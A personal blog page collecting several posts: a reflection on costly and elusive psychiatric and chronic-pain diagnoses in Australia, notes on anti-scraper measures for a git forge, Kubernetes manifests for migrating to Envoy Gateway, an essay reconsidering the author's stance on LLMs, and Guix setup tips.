kivikakk.ee

Dx

2026-05-19T02:14:31Z

Unless you pay for it, or it’s specifically designed to dehumanise you, you won’t get a diagnosis. There’ll just be something kinda wrong with you, but not in a legitimate way or anything. You’re probably imagining it. Have you tried yoga?

(This is written from the Australian perspective, where paying for general healthcare is not the norm, and likewise getting some company you pay to cover the more ridiculous bill of some other company that renders a health service is not contingent on perhaps some third party blessing you with a diagnosis that renders you eligible to claim such payments. I don’t know if that’s how it goes in the US but I imagine it may.)

To wit, here’s the list of diagnoses I actually have:

Autism. The assessment cost me around A$1000 (A$175 rebated) ca. 2022.
ADHD. Likewise the assessment was around A$1200 (A$255 rebated) ca. 2022; another A$900 (A$455 rebated) to get medication permits renewed in 2025.
Borderline personality disorder. This one cost me nothing apart from my usual psychiatrist session fees, and was covertly assigned! (You can read more about how that happens but woaaah pardner, read the notas de contenido first.)

Now, contrast this with the (already outdated!) list of medications I’ve ever been on. I guess I have had depression for decades of my life at a time. Anxiety of various forms, too; symptoms matching panic disorder for a year or so. Long COVID. Chronic insomnia. Heavy and persistent dissociative issues, though perhaps they fold into BPD. Likewise recurrent hypomania; or is it cyclothymia? PTSD; or is it cPTSD? I’ve met the “new clinical fibromyalgia diagnostic criteria” for about a year and a half by now, although as a diagnosis of exclusion (“3. You do not have a disorder that would otherwise explain the pain”), it’s funny because perhaps there are other, mutually exclusive diagnoses of exclusion that would match; namely hEDS, which I’m one or two (perhaps undiscovered!) signs off meeting.

But y’know, unless I go to a specialist and pay them specifically to assess me for something, it won’t happen. (Unless, per the opening paragraph, there’s something of you that needs to be stripped away. For society’s safety! And the life insurance companies’.) And this can be annoying: I would really like some answers, or hell — speaking now of chronic pain — a better legitimised excuse for feeling as awful as I do every day. Every time someone newly learns of how I’m doing: “oh but you look good!” “I hope you’re on the mend at least.” MY FRIEND I JUST TOLD YOU I HAVE HAD STEADILY WORSENING WIDESPREAD UNTREATABLE PAIN FOR TWO YEARS NOW DESPITE SEEING THIRTY DOCTORS A YEAR IN THAT TIME. WHAT DO YOU THINK.

The other thing I’d be remiss to omit is that health conditions and diagnoses are (by and large) not real¹. There is nothing so locable as “depression” in the brain/body/wherever you think things are. “Generalised anxiety disorder” and “social anxiety disorder” and “other specified anxiety disorder” aren’t, if the last one didn’t give it away, reified, separable, and specific conditions. Diagnostic criteria are for diagnoses, and diagnoses are for guiding treatment at the population level. At the individual level, you could have all the problems in the world and not one set of criteria may fit; or many may fit, and every one of those may indicate the wrong solution for you specifically.

otoh there are plenty that are, but those definitionally tend to have extremely specific indicators and correspondingly specific remedies (or wants thereof). ↩

WAHOO

2026-05-06T12:46:47Z

escraping

2026-04-26T11:03:23Z

The LLM scrapers started to reliably knock nóssa offline (even with Anubis difficulty increased), so I had to implement Measures :( Logged-out users can view the root page of any repository, but can’t navigate to any blob, tree or commit. (You can still clone them fine, though!)

That seemed like a pity since I like to deep-link a lot in posts and emails and that kind of thing, so I added a “signed URL” feature. This link to the code responsible is an example!

It still seemed a shame: registration isn’t open on the instance, so in practice no-one can navigate repositories but me and Annie. For a long time I wanted to support “remote” users from e.g. Forgejo instances for eventual coordination activities like issue tracking, and so now seemed like the time: you can login with Codeberg, GitLab, or GitHub, and an account is created automatically if it’s not linked to an existing one, with no extra steps. (Shout out to Überauth and OIDC.) To prevent abuse new accounts are given “viewer” status and can’t create new repositories or have public profiles.

This took a couple hours of a Sunday evening, mostly debugging semi-arcane “invalid redirect URI” responses¹, and I’m really happy it’s done.

I needed to add Plug.SSL to the stack to translate XF* headers in the %Plug.Conn{}; Überauth was reconstructing “redirected to” URIs with the wrong scheme/port and complaining the redirect was made incorrectly. ↩

Fluent jj / aggressive aliasing

2026-04-19T04:40:36Z

You are typing too much, and I don't mean you should be getting an LLM to do it instead.

disturbing lack of awareness

2026-04-09T04:26:08Z

The garbage just keeps getting worse, and something I’m struggling with now is that, increasingly, people are fooled by it! I stumble upon what was clearly one or two sentences fed into Claude and people are in the comments calling it the Best Article They’ve Ever Read On The Subject; worse, the comments are often by very (extremely) technically capable people, often those very disposed against LLMs! I don’t get it. They just managed to read several thousand words of nothing and, presumably(?) due to a lack of engagement with LLMs, they have no immune system for it. God help them if they actually try one once; perhaps these are the same people who get “one-shotted”.

A few months ago the reaction to these pieces was almost completely negative and the posts were buried quickly, but since the same updates landing that made these models quite reliable for coding tasks — which the anti- crowd by and large still do not think possible — the bullshit has really started to drown out the human-written stuff, with plenty of the perpetrators even full-on using them in the comments section of places known to be hostile to LLMs, and yet people’s bullshit detectors have fallen silent. It’s all a big yikes.

u could work with me if u wan

2026-03-12T23:01:23Z

Senior Backend Engineer (Ruby on Rails), Plan: Knowledge

safety.. first?

2026-03-09T01:39:30Z

figs 2

2026-03-07T09:55:38Z

bruh

2026-03-07T05:34:22Z

ingress-nginx is dead, long live the Gateway API

2026-02-28T06:38:46Z

You might be aware that Ingress NGINX is retiring next month (that’s tomorrow!). I really didn’t want to bother with replacing it, but I also didn’t particularly like the sound of running something barely maintained to begin with never receiving another patch again. After a half-hearted attempt to understand why I would want to use Istio, I’ve completed a migration to Envoy Gateway and will briefly document the changes in manifest form in case anyone else wants to copy-paste.

This first bit’s Flux CD-specific, but gives you the info you need anyway. Grab the HelmRelease. I use a custom cluster domain (not cluster.local) so I needed to configure it. Missing this caused a bit of wailing and gnashing of teeth wondering why it wouldn’t bring up.

---
apiVersion: v1
kind: Namespace
metadata:
  name: envoy-gateway-system
---
apiVersion: source.toolkit.fluxcd.io/v1
kind: HelmRepository
metadata:
  name: envoy-gateway
  namespace: envoy-gateway-system
spec:
  type: oci
  interval: 24h
  url: oci://docker.io/envoyproxy
---
apiVersion: helm.toolkit.fluxcd.io/v2
kind: HelmRelease
metadata:
  name: envoy-gateway
  namespace: envoy-gateway-system
spec:
  chart:
    spec:
      chart: gateway-helm
      reconcileStrategy: ChartVersion
      sourceRef:
        kind: HelmRepository
        name: envoy-gateway
        namespace: envoy-gateway-system
  interval: 24h
  values:
    kubernetesClusterDomain: cassax.hrzn.ee
---
apiVersion: kustomize.toolkit.fluxcd.io/v1
kind: Kustomization
metadata:
  name: envoy-gateway-config
  namespace: envoy-gateway-system
spec:
  interval: 24h
  path: "./flux/sources/envoy-gateway"
  prune: true
  sourceRef:
    kind: GitRepository
    name: flux-system
    namespace: flux-system

Here I’ve configured it to grab a kustomization from ./flux/sources/envoy-gateway (relative to the git repository the whole Flux system is configured from).

The kustomization’s manifest starts with this:

---
apiVersion: gateway.envoyproxy.io/v1alpha1
kind: EnvoyProxy
metadata:
  name: custom-proxy
  namespace: envoy-gateway-system
spec:
  provider:
    type: Kubernetes
    kubernetes:
      envoyService:
        type: NodePort
        patch:
          type: StrategicMerge
          value:
            spec:
              externalIPs:
              - 51.161.136.132
              externalTrafficPolicy: Local
      envoyDeployment:
        pod:
          nodeSelector:
            kubernetes.io/hostname: kala
---
apiVersion: gateway.networking.k8s.io/v1
kind: GatewayClass
metadata:
  name: envoy
spec:
  controllerName: gateway.envoyproxy.io/gatewayclass-controller
  parametersRef:
    group: gateway.envoyproxy.io
    kind: EnvoyProxy
    name: custom-proxy
    namespace: envoy-gateway-system

I don’t have a LoadBalancer (the cluster is just one node on a VPS), so we get the Envoy proxy to be a NodePort service with the IP of the interface we want it to listen on, the same way I used to for Ingress NGINX. Likewise coming across, externalTrafficPolicy: Local ensures the client source IP is preserved, and the Pod node selector targets the node I actually can serve internet traffic from. (Technically redundant right now; when I set up Ingress NGINX originally there were multiple nodes, and only kala is publicly routable, and maybe it’ll be the case in the future again.)

The GatewayClass ties the proxy to the gateway we’ll define now:

---
apiVersion: gateway.networking.k8s.io/v1
kind: Gateway
metadata:
  name: eg
  namespace: envoy-gateway-system
  annotations:
    cert-manager.io/cluster-issuer: letsencrypt
spec:
  gatewayClassName: envoy
  addresses:
  - type: IPAddress
    value: 51.161.136.132
  listeners:
  - name: http
    protocol: HTTP
    port: 80
    allowedRoutes:
      namespaces:
        from: All
  - name: https-kivikakk-ee
    protocol: HTTPS
    port: 443
    hostname: kivikakk.ee
    tls:
      mode: Terminate
      certificateRefs:
      - name: tls-kivikakk-ee
    allowedRoutes:
      namespaces:
        from: All
  # ...

We need to listen on port 80 for ACME (and HTTP to HTTPS redirects), and then we define listeners for every SNI’able host.

The HTTP to HTTPS redirect is the first HTTPRoute and it’s simple:

---
apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: http-to-https-redirect
  namespace: envoy-gateway-system
spec:
  parentRefs:
  - name: eg
    sectionName: http
  rules:
  - filters:
    - type: RequestRedirect
      requestRedirect:
        scheme: https
        statusCode: 301

Actual services get routes like this; I define these in the individual services’ manifests:

---
apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  annotations:
    external-dns.alpha.kubernetes.io/hostname: nossa.ee.
    external-dns.alpha.kubernetes.io/ttl: 24h
  name: nossa
  namespace: nossa
spec:
  hostnames:
  - nossa.ee
  parentRefs:
  - name: eg
    namespace: envoy-gateway-system
    sectionName: https-nossa-ee
  rules:
  - backendRefs:
    - name: nossa
      port: 80

(Actually, I use Timoni to make these things out of CUE because it’s way less painful and means I can’t accidentally e.g. define that port number incorrectly, relative to the port the Service sits on.)

www. redirects look like this:

---
apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: nossa-www-redirect
  namespace: nossa
spec:
  hostnames:
  - www.nossa.ee
  parentRefs:
  - name: eg
    namespace: envoy-gateway-system
    sectionName: https-www-nossa-ee
  rules:
  - filters:
    - requestRedirect:
        hostname: nossa.ee
        statusCode: 301
      type: RequestRedirect

It was a lot less painful than I’d feared, and I’m a lot happier doing this than Istio (seemed like SO much) or what I was going to fall back to, HAProxy Ingress (prefer to get onto Gateway).

But!

I tripped over two things.

First, nóssa is protected by Anubis. enbi needs to access it via git+https to build things. I also want to pull from/push to it from kala (the cluster node) itself. OOTB this was newly failing: Anubis was giving 500s, matching this issue: X-Forwarded-For & X-Real-Ip handling doesn’t properly respect private IPs #1270.

X-Forwarded-For and X-Real-Ip are a mess, and I dare you to read Envoy’s HTTP header manipulation documentation and come away feeling pure of soul.

---
apiVersion: gateway.envoyproxy.io/v1alpha1
kind: ClientTrafficPolicy
metadata:
  name: client-headers
  namespace: envoy-gateway-system
spec:
  targetRefs:
  - group: gateway.networking.k8s.io
    kind: Gateway
    name: eg
  headers:
    earlyRequestHeaders:
      set:
      - name: X-Real-Ip
        value: "%DOWNSTREAM_REMOTE_ADDRESS_WITHOUT_PORT%"

%DOWNSTREAM_REMOTE_ADDRESS_WITHOUT_PORT% is documented under the “Advanced” part of Envoy’s configuration reference, with a delightful note that it might be inferred from XFF anyway. Seems not to, though: I get external IPs logged by Anubis for x-real-ip when I make external requests, and cluster-internal ones from kala or from a different pod. Setting XFF to something fake doesn’t show up at all when external, and while it shows up in Anubis’s logs under x-forwarded-for when setting it on internal requests, x-real-ip is unaffected.

Second, I use MinIO for the “static hosting” of a bunch of sites; it’s convenient, this blog engine uses its API for asset admin, Annie can push her sites with it, etc. (I do want to get off it since it’s undergoing AI enshittification.)

I have one MinIO instance with buckets served out of subdirectories; e.g. https://s3.hrzn.ee/comrak.ee/index.html.

I used to use nginx.ingress.kubernetes.io/rewrite-target: /comrak.ee$uri on the comrak.ee ingress with a backend of the https-minio service, so a request for https://comrak.ee/index.html would translate internally to /comrak.ee/index.html. (And add a rewrite configuration snippet to handle / to /index.html explicitly.)

Porting this naïvely did not work: I don’t know if it’s a Gateway spec thing or an Envoy Gateway thing, but a filter with replacePrefixMatch: /comrak.ee/ when matching a PathPrefix of / would nonetheless strip the trailing /; requests for https://comrak.ee/index.html would get rewritten to request /comrak.eeindex.html. Specifying an empty string for the PathPrefix made no difference. Adding a second / at the end of the replacement worked. This feels somehow demeaning, but what can you do:

---
apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  annotations:
    external-dns.alpha.kubernetes.io/hostname: comrak.ee.
    external-dns.alpha.kubernetes.io/ttl: 24h
  name: static-comrak.ee
  namespace: minio-kala
spec:
  hostnames:
  - comrak.ee
  parentRefs:
  - name: eg
    namespace: envoy-gateway-system
    sectionName: https-comrak-ee
  rules:
  - backendRefs:
    - name: minio
      port: 80
    filters:
    - type: URLRewrite
      urlRewrite:
        path:
          replaceFullPath: /comrak.ee/index.html
          type: ReplaceFullPath
    matches:
    - path:
        type: Exact
        value: /
  - backendRefs:
    - name: minio
      port: 80
    filters:
    - type: URLRewrite
      urlRewrite:
        path:
          replacePrefixMatch: /comrak.ee//         # yuk
          type: ReplacePrefixMatch
    matches:
    - path:
        type: PathPrefix
        value: /

That’s it, I’m done thinking about ingress for a long time again. If this happens again I’m going back to my cursed NixOS integrated ingress.

on llms (Ⅳ)

2026-02-23T11:57:31Z

I’ve been thinking about LLMs a lot lately. Haven’t we all.

Here’s my reading from the last few years:

(skip)

2016 (easter egg!)

Google says machine learning is the future. So I tried it myself

2023

2024

2025

2026

A lot of it is very, very negatively inclined; I’ve done my best to take an interest in alternate viewpoints over the years, as well as some technical detail to stay grounded in the “what”. Despite my obviously strong feelings about the matter, I really do believe in keeping an open mind and reading widely. (It goes without saying that an article appearing above does not equal endorsement.) Likewise, despite not having an account on Lobste.rs, I continue to read most of the discussion that goes on there, and there sure has been a lot of it about LLMs!

The thing about keeping an open mind is that it can change. My concerns about LLMs have been pretty total:

Environmental impact. Our world is burning, and you know what it doesn’t need more of right now? Datacentres.
Economic impact. The share markets are a fuck, the flow-on effects (RAM prices!) widely felt, and every product is now ✨ intelligent ✨ in a way no-one ever asked for.
- The CEOs dreaming of replacing all workers with LLMs :) :) and then blaming lay-offs on “AI” when actually it’s just sparkling (✨) recession.
They Can’t Work.
For programmers particularly, there’s a continuum of fun new stuff from identity loss to an overwhelm of slop patches and everything in between.
Theft and DDoS at scale are cool and we all love it

So far, so good. Sometimes the criticisms do get a little unhinged when evaluated from a “love thy neighbour” standpoint:

Well that’s obviously relative and subjective— it’s reasonable for people who cheer for LLMs to trample on others’ infra, DDoS it, perform incessant scraping, ignore copyright and treat everything on the Internet as their own public domain dataset, destroy FOSS ecosystems, destroy personal computing and move us into a future of rented compute all for the sake of apparent results and “substance”. It’s reasonable for such people to agree with the principle of the end justifies the means.

And I guess, as someone who really likes nuance, arguments that totally discard nuance and any appreciation whatsoever for the humanity and experiences of “the other side” do grate.

One argument that has come up a lot traditionally, and that I have made myself, is that they just Don’t Work; sometimes the argument is that they Can’t Work. Seeing the sheer quantity of people using these tools and being quite confident that they do work really made me wonder about this argument. People really still like it in the Year of our Lord 2026.

I’ve been employed at a big, publicly-owned software development software development company [sic] for the past five months. This means a lot of “AI” push from the top. One month in, I was pretty sure I could avoid using LLMs until the bubble popped. Eventually, though, a combination of (a) being pushed to use them, (b) the insistence that they Don’t Work, from people who by and large don’t use them, (c) the slowly growing portion of usually pretty level-headed people who are quite sure they do, (d) the availability of the best of breed of these tools to me at work without my having to personally give money to The Companies, and (e) that bubble not popping yet!!, all combined to my deciding to evaluate those claims.

I try really hard to steelman my own arguments against myself, so instead of sticking to my “running qwen3-coder:30b locally is completely not worth the time and results” line, given the opportunity, let’s see what agentic Opus 4.5 through OpenCode (via DAP) for work tasks can do. I started very small, and found myself remembering to try it out once every few days.

And what do you know, it’s really capable. It is very good. I wouldn’t ever let it or any LLM communicate for me — much like I have never let any tool do that, be it LLMs, Gmail’s age-old “here I’ll try to guess what you want to say!!” or otherwise — but at development tasks, it’s super capable. It will indefatigably work out why something happened, in a huge codebase, with reference to megabytes of logs. It’ll capably suggest solutions, poke holes in yours, and get things wrong itself. It will happily substitute for your theory if you let it, it’ll write poor code if you’re not careful, and if you’re not clear enough about what you’re doing, it may well be a net-negative. It is a very quick, tireless, and reasonably unhinged assistant, and it absolutely makes Enterprise™ working conditions for the senior+ engineer so much more palatable. I can only speak from my own experience, but my experience is that it’s solid.

I don’t say any of this lightly. I am really good at my job. I am not at all afraid of this replacing me. But holy shit, does it make some really tricky tasks virtually effortless?! Today a random set of 20 unrelated tests started to fail consistently in the GitLab 18.8 backport branch. I pointed it at some job logs, explained the situation and what I’d observed, and set the agents to work. I don’t have any experience with any of the tests or the feature areas affected; I have nothing to lean on here other than my observations trying and failing to get my backports past CI, realising these flakes were no longer flaking in the “let things pass” direction. It read all though failing tests’ code, read all the code those tests invoked (THERE IS A LOT), then read the test harnesses, the helpers for those, and within 10 minutes produced a theory which explained precisely what was going on to cause this extreme edge. That’s a super helpful tool to have, and saying otherwise is just incorrect? Would it have been better for me to load and commit all that to my own memory with some hours of reading and poking, and be a hero of diagnosing this one weird failure in the 18.8 backport branch, which will receive its last patch two months from now? I don’t think so.

And iunno, here we get to the pointy end of things. I long didn’t have to care about thinking through the Hard™ ethics issues around LLM use, because it fundamentally Doesn’t Work and therefore resolving them was fruitless. It turns out, though, that it Does Work. So where does that leave us?

Theft and DDoS at scale are cool and we all love it

The truth is, theft is cool. I mean it. A long time ago I believed in copyleft — I was a card-carrying FSF member, GNU plus Linux, GPLv3 all the things. Part of me still has a huge amount of sympathy for that position.

But part of me also slaps the UNLICENSE, WTFPL, CC0 or otherwise on a lot of things I produce. Part of me would much rather abolish copyright than try to use copyright against corporations. I felt the “it’s better to have a seat at the table” angle vacate my body entirely when GitHub’s top brass used that argument to maintain a cosy relationship with ICE: is weaponising copyright law legitimising it? We all hate the DMCA, yet a takedown notice is often the tool of choice for FOSS licensing violations!

I don’t think it’s easy to resolve this tension, but I’m very happy about Sci-Hub, I use The Pirate Bay and private trackers for some things while insisting on buying all the music I listen to (and buying copies for friends!), and I prefer the world where people and organisations get to use my open-sourced stuff (and yes, make money from it without having to give me any) it than the alternate one where essentially no-one uses it.

I realise this is a bit self-serving (inasmuch as I derive satisfaction from making stuff that’s useful), but I’m doing my best to be honest and not apologise for the fact that my positions don’t/can’t neatly resolve into one side. If there was a different alternate world where we weren’t already fatally capitalistically fucked in the head and the software was useful for lots of people without there being anyone needing or wanting to make money from it, that would be so cool! This ain’t it, though.

So like, okay. Abolish copyright. Abolish intellectual property. It’s actually fine that a bunch of companies decided to Compile The Whole Internet into a file. Wish I did that first. Hope someone leaks that file.

Now like, I don’t actually love that for a number of reasons; I’m particularly unhappy with OpenAI as a company and as a concept, based on just about everything I have ever heard of that has even the slightest thing to do with Sam Altman, as well as their scraping practices, business practices, etc. etc. etc.

But I no longer feel that someone using large models on the scale of those of OpenAI is necessarily committing a particularly ethically dubious act by virtue of the model they have used. Yeah, they ingested your writing and code and art. Mine too. Takes a village to build a real proper egregore I guess. Totally figures that it’d be Corporate America to do that first.

And it super totally sucks that they DDoS us all in order to do this. I deploy Anubis and I think you should too. (Pause for a beat while you think about Anubis’s creator using LLMs! Guess how much pause this has given me!) Inasmuch as it’s very hard to separate the practices involved in compiling these datasets and the result themselves, that seems pretty clear-cut?

But. I also think it’s ethically dubious to sample the DNA of living animals to create seeds to generate lab-grown meat. THAT SAID, if people have done that already — or do do that, today — and it means that as a result, vast quantities of lab-grown meat are consumed instead of killing animals, is that a bit of a win for me as a vegetarian? It is quite a bit of a win.

We are perhaps beyond the point where the frontier models need or can even find useful new data to ingest; it would appear the internet has been thoroughly scraped a hundred times over. That obviously doesn’t mean they’ll stop, or that new labs won’t start, but in terms of the models that exist today and which Generate Value™ not from further scraping but from what’s been done — imo, if they actually help us, real actual People, they can yet be part of what is “a bit of a win”. I’m not convinced we need to punish the technology for the sins of the creators, even if they are still entangled at this moment. (And I just don’t think we, as indivduals, can meaningfully punish the creators, but I’ll get to that.)

For programmers particularly, there’s a continuum of fun new stuff from identity loss to an overwhelm of slop patches and everything in between.

Yeah it sucks ass, but every technology transition has this; programmers have had an easy few decades when the worst thing most people can name is Agile or having to learn Kubernetes or AWS or whatever. I think Competence as Tragedy summed it up better than I could.

Slop patches are part of this too; Claude Code is the new AOL Usenet gateway. We’ll all adapt in different ways. On Comrak I simply banned LLMs. Everyone gets to make up their own mind, and they don’t have to be of the same mind everywhere. We are headed to nuance-town, baby.

I still think Naur is right, and if you forget to treat an LLM as an actual other — meaning, when it writes the code, if you haven’t exercised what it’s suggested in your mind, and ideally on the actual computer, you most certainly haven’t got the theory — you will struggle to keep a hold on what’s going on. But, like many other others (coworkers, past selves, etc.), you can ask an LLM to try to explain what it’s come up with, and these days it will often do a pretty good job. This dovetails with …

They Can’t Work.

So it turns out they do, and this throws a bit of a metaphysical spanner in the works. What does it mean if they can’t work, but they do? And like, a year ago it was very clearly “they kinda work but mostly don’t and this is actually gonna be a waste of time” (particularly if you were like me and insisted on only ever trying local models, so as not to provide demand signal beyond one-off model downloads). Today it is very clearly “they mostly work really fucking well, often absurdly so, and while they can still get lost or overlook things, generally this is akin to magic when it comes to actually useful needed tasks”. They make things possible. How does one square that with “but they can’t”?

A point I was really hung up on before was the notion that the transformer architecture fundamentally hallucinates; that when you boil it down, of course it’s just text prediction, heck I’ve written dozens of hidden Markov models in my lifetime, and so it’s not even like a model of a human-ish brain where we could say, oh sure, increase n by enough orders of magnitude and perhaps intelligence emerges, and we know it might because look at us. (And we’re not getting there because the human brain and human intelligence is very much embodied, and we’re never really proposing making full-on universal physics simulators. (are we?))

So it can’t be intelligent, and it can’t act intelligent. So what the fuck is going on when it does? Something else, obviously, but the fact is, you as an intelligent being can intelligently formulate an intelligent proposition to it, and it will give you an answer/construct a solution/form a counter-proposal/agree with what you said and execute on it while figuring out what do with all the gaps in the language you used in a very, uhhhhh, Clever, manner.

The tl;dr for this section is, I am super happy to say, y’know what, something like intelligence does ~emerge~ when you take a language model and keep cranking up the power factor. They briefly appear intelligent by their use of language at low n but are clearly not when they say or do things that don’t actually follow. Does it follow that they aren’t at high n, even when the percentage of things said or done that don’t follow falls to a very low number indeed? I don’t know, but I do know that if you reduce the total complexity of the human brain by, say, ablating part of Wernicke’s area, to outside observers you might also briefly appear intelligent, and then suddenly not. Does this mean we are not actually intelligent? Much to think about.

And while their failure modes are completely unrelatable to us, and “experience” likewise due to their completely different substrate and architecture, I just don’t think we can conclude that they therefore do not possess (or embody!!) any kind of intelligence, nor have any kind of experience. I’m not proposing sentience here, but I can’t even say for sure that they haven’t that in some way, either, or that our definition isn’t overly fitted to the ways in which we reason and use it! Can you say for sure anyone else does possess sentience? These weren’t exactly solved problems before LLMs came along; I was thinking about solipsism when I was in primary school. (Just trans things haha) LLMs are probably the single-most complex things we have ever created (in a information theoretic kind of way). I just, I dunno — I’m not ready to make solid assertions here, and I don’t really get how so many are so willing to dispense with nuance to make bold claims in completely understudied (and partly unknowable) areas! Please re-read this essay series:

Economic impact. The share markets are a fuck, the flow-on effects (RAM prices!) widely felt, and every product is now ✨ intelligent ✨ in ways no-one ever asked for.

WELCOME TO CAPITALISM OPERATING AS INTENDED. Remember “there is no ethical consumption under …”? We are SEVERELY beyond the point of normalisation, and refusing to admit that is like refusing to admit that your riding a bicycle to work isn’t going to make the rest of the world give up ICE vehicles and make us unpave all the roads. Yes, cars have had a really big head start, but we’ve barely begun building the new datacentres supposedly needed for AI’s Line Goes Up Forever and if you haven’t noticed, this stuff is already widespread! I bet you have noticed, though, because we’re all constantly talking about it! This is the magic of software, of things whose substrate is information, which I think we were all already aware of! The cat well and truly is out of the bag.

Choosing to abstain here is not going to make RAM prices come back down. The CEOs were busy masturbating at the altar of share prices when they were all making the replacement claims, and they have continued to do so as they realise that agents cannot in fact replace workers (though they may well try to reduce the number of juniors and then screw over the funnel for the industry as a whole, it’s been happening for a while now and we see the same happening with middle-management though I don’t feel the funnel concern carrying over there, and does this have anything do with LLMs? I don’t think so — but I digress). They still do so as they blame the recession-hiding-under-the-covers-of-inflated-share-prices layoffs on reduced need for workers due to AI. We will stop getting ✨ Summarize buttons (spelled with a ‘z’ ofc) as soon as they figure out the company to pump after Nvidia. And yet the models are not going to suddenly vanish when that happens.

In short, when did the decisions made by billion-to-trillion-dollar company CEOs actually make the slightest difference to what you should or should not be doing? You asking Gemini a translation question or vibe-coding a menubar widget is not what makes or breaks Sundar Pichai and topples this thing over. They’ve pushed everything this way; does that mean you must, by rights, do the opposite thing? It doesn’t follow.

I also really don’t want to seem like I’m saying “yeaahhhh just go do terrible shit”, here, either, because I’m not; I’m saying that while intoning YOU LLM FANATICS ALL THINK THE END JUSTIFIES THE MEANS is an emotionally satisfying position to hold, I don’t think it really holds. YOU CAR DRIVERS ALL THINK THE DESTINATION JUSTIFIES THE POLLUTION. Idk.

Environmental impact. Our world is burning, and you know what it doesn’t need more of right now? Datacentres.

I keep coming back to the cars/fossil fuels analogy and I see some other folks around this time are too. We have paved over most of our cities with horrid amounts of roads. Cars themselves are obviously polluting, with companies being happy to commit scandals to work around the fact that governments were starting to think this was maybe a bad idea. For a fun one, try considering air travel. Coal power sucks. It sucks that nuclear failed to get off the ground, but who knows, maybe we dodged a bullet.

You can usually point the finger at capitalism and be correct, and the same generally applies here. The (proposed) build-outs are not in service of any realistically desirable goal; just Line Goes Up. But at this point, the actual use of these services (inference costs) is negligible. The water consumption is negligible. The demand signal is negligible.

And I used to humm and haaa about normalisation specifically re: demand signals and the prospect of using these tools and that being known, even if all the other concerns were somehow negated, but like, that window has well and truly passed us, and I don’t think any one (or hundred or more) of us could have really impacted that. It is too late, and it’s really hard to say “this is realism and not fatalism” without it just sounding like fatalism to someone who’s two feet sunk deep in the contra- tribe (and it would be silly, I think, to not observe the tribalism that’s developed). I am aware of this. I am not really trying to convince you, though; here I’m just writing out my reasoning, because y’know, writing and thinking go hand-in-hand.

We were committed to this line as well and truly as we were to the global re-rise of fascism, to the “post COVID except for the bit where we’re post COVID, oops, here, have some vaccine denialism” bit, to the not-so-proxy wars bit, not because any one person was too happy to be swayed by Trump, or was too anti-authoritarian, etc. etc., but because the world system we’ve ended up with allowed the interests of not the 1% but the 0.01% to control everything. Neoliberalism has well and truly had its way with us.

This being the case, it makes sense to protect yourselves against racists and transphobes and do your best to educate where possible, to protect yourself against deadly airborne diseases and encourage your friends to do the same, and to be wary of your warmongering neighbour while also ever keeping in mind that your warmongering neighbour’s citizens are just as caught up in this as you. We do not simply give in.

What about LLMs? Does it make sense to then strictly abstain? I dunno for sure, but I’ve come to conclude: probably not.

You should be careful, of course, because there are new knives in the kitchen and they are sharp in unexpected ways; their failure modes of thinking (of “thinking”) are indeed unlike ours; LLM psychosis is real and those insisting it isn’t have no fucking idea what psychosis is (and I assure you, you do not truly find out any way except experentially); you will certainly lose the theory (or just fail to build one) if you go full-vibe-code; I imagine it’s relatively easy to use the tools in ways that cause a loss of skill, or degradation of memory. (It sounds a lot like I’m describing hallucinogens here, and qué sorpresa, I don’t think you should strictly abstain from those either.)

But I don’t believe any more that total abstention is the only moral way. I know there are loads of reasons to be angry, but I don’t think LLM users are the correct target for this anger, much like I don’t think car users are, or people who don’t fund 100% of their home’s electricity with Green Energy Credits™, or meat eaters. I say this having spent some time uncomfortably both being angry at LLM users while also tentatively occupying the role myself. It would’ve been a lot easier to retreat back to the comparatively psychologically safe black-and-white position I inhabited before (coulda saved myself this whole essay!), but it wouldn’t have been honest.

Thanks for reading.

some things to make guix (system) less painful

2026-02-11T10:18:36Z

I’m grateful to Nemin for writing about his experiences with Guix! I’ve been thinking about it for months at this stage, and have an aarch64 VM from the 1.5.0 release. It’s felt awkward and I haven’t known how to get started, particularly because of how slow things seem to be.

Some things that have really helped me speed things up:

Use Guix Moe’s substitutes

“Guix Moe”: Build farm and mirrors for community channels introduces it. You may be wondering where exactly to put the (simple-service 'guix-moe …) stanza.

Wonder no more. Your /etc/config.scm will have a (services …) declaration. There will probably be a list of (service …) declarations in a list inside that. Add it there. Mine looks like this:

[…]
      ;; Uncomment the line below to add an SSH server.
      (service openssh-service-type)
       
      ;; Add support for the SPICE protocol, which enables dynamic
      ;; resizing of the guest screen resolution, clipboard
      ;; integration with the host, etc.
      (service spice-vdagent-service-type)

      ;; Use the DHCP client service rather than NetworkManager.
      (service dhcpcd-service-type)

      (simple-service 'guix-moe guix-service-type
                      (guix-extension (authorized-keys (list (plain-file
                                                              "guix-moe-old.pub"
                                                              "(public-key (ecc (curve Ed25519) (q #374EC58F5F2EC0412431723AF2D527AD626B049D657B5633AAAEBC694F3E33F9#)))")
                                                             ;; New key since 2025-10-29.
                                                             (plain-file
                                                              "guix-moe.pub"
                                                              "(public-key (ecc (curve Ed25519) (q #552F670D5005D7EB6ACF05284A1066E52156B51D75DE3EBD3030CD046675D543#)))")))
                                      (substitute-urls '("https://cache-cdn.guix.moe")))))

;; Remove some services that don't make sense in a VM.
(remove (lambda (service)
          (let ((type (service-kind service)))
[…]

I’ve included lots of context so you don’t get lost. This gets you some more pre-built packages. sudo guix system reconfigure /etc/config.scm.

Change your `guix` channel source to Codeberg

I could die and git.guix.gnu.org wouldn’t notice. Get acquainted with Guix Home. We’ll be customising the Guix channel itself per 6.2 Using a Custom Guix Channel, and doing it in Guix Home per 13.3.9 Guix Home Services.

Because we’re replacing the default, we don’t want to just add a channel. Add this service to your home-environment, similar to above:

(service home-channels-service-type
         (list (channel
                 (name 'guix)
                 (url "https://codeberg.org/guix/guix.git")
                 (branch "master")
                 (introduction
                   (make-channel-introduction
                     "9edb3f66fd807b096b48283debdcddccfea34bad"
                     (openpgp-fingerprint
                       "BBB0 2DDF 2CEA F6A8 0D1D  E643 A2A0 6DF2 A33A 54FA"))))
               ; any other channels here
               ))

I pulled that introduction from https://hpc.guix.info/static/doc/complex-deployment/channels.scm. Looks safe to me!

guix home reconfigure blah.scm.

Hey, saayix has some nice software

I really wanted Ghostty, and it turns out someone’s got it packaged and up-to-date! https://codeberg.org/look/saayix/src/commit/b9b22f9ca03a452c4d8801b200da0095f54090e8/modules/saayix/packages/terminals.scm

